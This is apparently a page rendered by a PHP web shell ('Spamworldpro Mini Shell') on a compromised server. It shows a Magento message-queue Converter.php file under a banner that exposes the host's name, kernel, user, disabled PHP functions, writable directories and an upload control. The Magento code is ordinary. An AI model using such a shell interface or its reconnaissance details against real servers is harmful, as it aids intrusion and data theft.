Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/magento/framework-message-queue/Publisher/Config/Xml/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/magento/framework-message-queue/Publisher/Config/Xml/Converter.php
<?php
/**
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */
namespace Magento\Framework\MessageQueue\Publisher\Config\Xml;

use Magento\Framework\Stdlib\BooleanUtils;
use Magento\Framework\MessageQueue\DefaultValueProvider;

/**
 * Converts MessageQueue publishers config from \DOMDocument to array
 */
class Converter implements \Magento\Framework\Config\ConverterInterface
{
    /**
     * Boolean value converter.
     *
     * @var BooleanUtils
     */
    private $booleanUtils;

    /**
     * @var DefaultValueProvider
     */
    private $defaultValueProvider;

    /**
     * Initialize dependencies.
     *
     * @param BooleanUtils $booleanUtils
     * @param DefaultValueProvider $defaultValueProvider
     */
    public function __construct(BooleanUtils $booleanUtils, DefaultValueProvider $defaultValueProvider)
    {
        $this->booleanUtils = $booleanUtils;
        $this->defaultValueProvider = $defaultValueProvider;
    }

    /**
     * @inheritdoc
     */
    public function convert($source)
    {
        $result = [];
        /** @var $publisherConfig \DOMElement */
        foreach ($source->getElementsByTagName('publisher') as $publisherConfig) {
            $topic = $this->getAttributeValue($publisherConfig, 'topic');

            $connections = [];
            /** @var \DOMNode $connectionConfig */
            foreach ($publisherConfig->childNodes as $connectionConfig) {
                if ($connectionConfig->nodeName != 'connection' || $connectionConfig->nodeType != XML_ELEMENT_NODE) {
                    continue;
                }
                $connectionName = $this->getAttributeValue(
                    $connectionConfig,
                    'name',
                    $this->defaultValueProvider->getConnection()
                );
                $exchangeName = $this->getAttributeValue(
                    $connectionConfig,
                    'exchange',
                    $this->defaultValueProvider->getExchange()
                );
                $isDisabled = $this->getAttributeValue($connectionConfig, 'disabled', false);
                $connections[$connectionName] = [
                    'name' => $connectionName,
                    'exchange' => $exchangeName,
                    'disabled' => $this->booleanUtils->toBoolean($isDisabled),
                ];
            }
            if (count($connections) === 0) {
                $connections[$this->defaultValueProvider->getConnection()] = [
                    'name' => $this->defaultValueProvider->getConnection(),
                    'exchange' => $this->defaultValueProvider->getExchange(),
                    'disabled' => false
                ];
            }
            $isDisabled = $this->getAttributeValue($publisherConfig, 'disabled', false);
            $result[$topic] = [
                'topic' => $topic,
                'disabled' => $this->booleanUtils->toBoolean($isDisabled),
                'connections' => $connections,

            ];
        }
        return $result;
    }

    /**
     * Get attribute value of the given node
     *
     * @param \DOMNode $node
     * @param string $attributeName
     * @param mixed $default
     * @return string|null
     */
    private function getAttributeValue(\DOMNode $node, $attributeName, $default = null)
    {
        $item = $node->attributes->getNamedItem($attributeName);
        return $item ? $item->nodeValue : $default;
    }
}

Spamworldpro Mini